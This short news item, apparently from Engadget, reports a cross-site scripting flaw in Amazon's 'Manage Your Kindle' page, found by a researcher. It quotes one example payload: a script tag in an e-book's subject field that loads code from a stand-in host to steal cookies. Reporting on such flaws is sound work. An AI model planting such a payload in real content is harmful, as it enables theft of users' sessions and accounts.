Next time you come across a Kindle e-book link somewhere other than Amazon itself, you may want to make sure it's not some dubious website before you hit download or "Send to Kindle." A security researcher by the name of Benjamin Daniel Musser has discovered that the "Manage Your Kindle" page contains a security hole -- one that hackers can take advantage of with the help of e-books hiding malicious lines of code. Once you load the Kindle Library with a corrupted e-book (typically with a subject that includes <script src="https://www.example.org/script.js"></script>), a hacker gets access to your cookies, and, hence, your Amazon account credentials.

http://www.engadget.com/2014/09/16/k...-flaw-e-books/